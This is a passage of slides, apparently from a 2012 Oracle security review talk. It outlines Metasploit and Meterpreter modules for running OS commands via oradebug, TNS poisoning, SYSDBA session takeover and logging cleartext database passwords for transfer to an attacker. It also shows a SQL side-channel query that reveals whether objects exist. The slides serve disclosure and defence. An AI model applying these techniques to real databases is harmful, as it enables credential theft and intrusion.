![Page 117: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/117.jpg)
Metasploit / Meterpreter Modules! Metasploit is a open-source security framework.
Metapreter is an advanced payload for Metasploit
![Page 118: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/118.jpg)
Metasploit / Meterpreter Modules! Metasploit is a open-source security framework.
Metapreter is an advanced payload for Metasploit
! Metasploit Module: oradebugRun OS commands via oradebug call system
![Page 119: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/119.jpg)
Metasploit / Meterpreter Modules! Metasploit is a open-source security framework.
Metapreter is an advanced payload for Metasploit
! Metasploit Module: oradebugRun OS commands via oradebug call system
! Metasploit Module: tnspoison Allows to redirect network traffic to pytnsproxy
![Page 120: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/120.jpg)
Metasploit / Meterpreter Modules! Metasploit is a open-source security framework.
Metapreter is an advanced payload for Metasploit
! Metasploit Module: oradebugRun OS commands via oradebug call system
! Metasploit Module: tnspoison Allows to redirect network traffic to pytnsproxy
! PYTNSPROXY: TNS proxy which is used together with the tnspoison metasploit module
![Page 121: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/121.jpg)
Metasploit / Meterpreter Modules! Metasploit is a open-source security framework.
Metapreter is an advanced payload for Metasploit
! Metasploit Module: oradebugRun OS commands via oradebug call system
! Metasploit Module: tnspoison Allows to redirect network traffic to pytnsproxy
! PYTNSPROXY: TNS proxy which is used together with the tnspoison metasploit module
! Meterpreter extension: oraloglogs cleartext passwords by hooking into encryption/decryption routine of the DB server
![Page 122: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/122.jpg)
Metasploit / Meterpreter Modules! Metasploit is a open-source security framework.
Metapreter is an advanced payload for Metasploit
! Metasploit Module: oradebugRun OS commands via oradebug call system
! Metasploit Module: tnspoison Allows to redirect network traffic to pytnsproxy
! PYTNSPROXY: TNS proxy which is used together with the tnspoison metasploit module
! Meterpreter extension: oraloglogs cleartext passwords by hooking into encryption/decryption routine of the DB server
! Meterpreter extension: ocioraloglogs the cleartext password from the OCI driver
![Page 123: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/123.jpg)
Concept
! Metasploit is used to run TNS poisoning and redirect the TNS traffic to the PYTNSproxy.
![Page 124: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/124.jpg)
Concept
! Metasploit is used to run TNS poisoning and redirect the TNS traffic to the PYTNSproxy.
! If a SYSDBA connects to the database server the session could be overtaken
![Page 125: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/125.jpg)
Concept
! Metasploit is used to run TNS poisoning and redirect the TNS traffic to the PYTNSproxy.
! If a SYSDBA connects to the database server the session could be overtaken
! The oradebug feature is used to inject code in the process space of the database and hook into the decrypt functions
![Page 126: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/126.jpg)
Concept
! Metasploit is used to run TNS poisoning and redirect the TNS traffic to the PYTNSproxy.
! If a SYSDBA connects to the database server the session could be overtaken
! The oradebug feature is used to inject code in the process space of the database and hook into the decrypt functions
! All database passwords are written in cleartext into a textfile (contains all passwords including DB Vault)
![Page 127: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/127.jpg)
Concept
! Metasploit is used to run TNS poisoning and redirect the TNS traffic to the PYTNSproxy.
! If a SYSDBA connects to the database server the session could be overtaken
! The oradebug feature is used to inject code in the process space of the database and hook into the decrypt functions
! All database passwords are written in cleartext into a textfile (contains all passwords including DB Vault)
! File with passwords can be transferred to the computer of the attacker.
![Page 128: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/128.jpg)
Run OS Commands from the web
http://soonerorlater.hu/download/DerbyCon2.0_think_differently_spala_toth.pdf
![Page 129: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/129.jpg)
Side Channel attack on ORA-00942 *
! Martin Berger showed that a side channel attack is possible against Oracle and ORA-00942 *
! The number of recursive calls and count execute allows to find out if object exists.
* http://berxblog.blogspot.com.au/2012/09/side-channel-attack-on-ora-00942.html
![Page 130: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/130.jpg)
Run OS Commands from the web3
select"ms.sid,"ms.statistic#,"sn.name,"ms.value"from"v$mystat"ms,"V$STATNAME"sn"where"sn.name"in"('recursive"calls',"'execute"count')"and"ms.statistic#"="sn.statistic#"order"by"2;
SQL> select * from a.uztrfghj;select * from a.uztrfghj *ERROR at line 1:ORA-00942: table or view does not exist21 recursive calls 3 execute count
No user ZZZ exists, but a user A exists. (but no table A.UZTRFGHJ) There is one more recursive call if the user exists.
SQL> select * from a.m ;select * from a.m *ERROR at line 1:ORA-00942: table or view does not exist26 recursive calls 7 execute count
Now there are even more recursive calls and execute count. The Table A.M exists.
![Page 131: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/131.jpg)
October 2012
• Oracle CPU October 2012 *
• Application Security of Core Banking Systems **
* http://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html** https://www.sec-consult.com/en/Vulnerability-Lab/Studies.htm
![Page 132: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/132.jpg)
October 2012 CPU*
• 5 security fixes (1 remote exploitable)
• Core RDBMS
* http://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html
![Page 133: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/133.jpg)
65
![Page 134: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/134.jpg)
November 2012
• DOAG 2012
![Page 135: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/135.jpg)
Summary
! Annus Horibilis for Oracle (Java, MySQL, Oracle)
! Easy SQL Injection bugs in PL/SQL are nearly gone. Researcher are looking for more complicated bugs.
! Critical bugs are not fixed only workaround are available
! Nearly all databases (TNS Poisoning) or 11g databases (Stealth Password Cracking) are affected.
![Page 136: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/136.jpg)
Thank you! Contact:
Red-Database-Security GmbH
Bliesstr. 16
D-.66538 Neunkirchen
Germany